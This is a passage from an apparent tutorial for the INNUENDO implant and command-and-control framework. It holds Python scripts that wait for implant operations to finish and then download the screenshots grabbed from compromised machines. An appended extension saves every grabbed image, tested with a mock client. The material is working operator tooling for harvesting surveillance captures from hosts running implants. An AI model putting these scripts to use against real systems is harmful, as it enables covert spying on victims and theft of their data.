        elif event['name'] == 'operation_updated':
            # grab the ID of the operation that was just updated
            oper_id = event['data']['id']
            
            # make sure it's an operation we are tracking
            if oper_id not in oper_ids:
                continue
            
            # get the operation data so we can check its state
            oper = c.operation_get(oper_id)
            print 'operation_updated:', oper['state']
            
            # wait until the operation is finished
            if oper['state'] != 'finished':
                continue
            oper_ids.remove(oper_id)
            
            # grab and unpack the operation's attributes
            res = c.operation_attributes(oper_id)
            attrs = msgpack.unpackb(res)
            
            # get the remote path of the first screenshot
            remote_path = attrs['data'][0]['path']
            local_path = os.path.basename(remote_path)
            
            # stream the screenshot to a local file
            with open(local_path, 'w+b') as file:
                for chunk in c.file_download(remote_path):
                    file.write(chunk)
            print 'saved:', local_path

if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        pass

With this script running, you should see a new screenshot saved to the current directory soon after every new implant process activates. This same procedure can be used to process results from any INNUENDO operation. Stay tuned for more!
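As noted earlier, `attrs['data']` can hold more than one image, so a small extension of the download step saves every entry instead of just index 0. The `FakeClient` below is invented here as a stand-in for `rpc.Client`, serving two in-memory "screenshots" so the sketch runs without a C2:

```python
import os

class FakeClient(object):
    # Stand-in for rpc.Client: serves two in-memory "screenshots".
    files = {
        '/tmp/grab_0.png': b'PNG-bytes-0',
        '/tmp/grab_1.png': b'PNG-bytes-1',
    }

    def file_download(self, remote_path):
        data = self.files[remote_path]
        for i in range(0, len(data), 4):   # stream in small chunks
            yield data[i:i + 4]

def save_all(client, attrs, dest_dir):
    """Download every screenshot listed in the operation attributes."""
    saved = []
    for entry in attrs['data']:
        remote_path = entry['path']
        local_path = os.path.join(dest_dir, os.path.basename(remote_path))
        with open(local_path, 'w+b') as fh:
            for chunk in client.file_download(remote_path):
                fh.write(chunk)
        saved.append(local_path)
    return saved

attrs = {'data': [{'path': p} for p in sorted(FakeClient.files)]}
print(save_all(FakeClient(), attrs, '.'))
```

With a real client and real operation attributes, `save_all(c, attrs, '.')` drops every grabbed image into the current directory using the same chunked streaming as the main script.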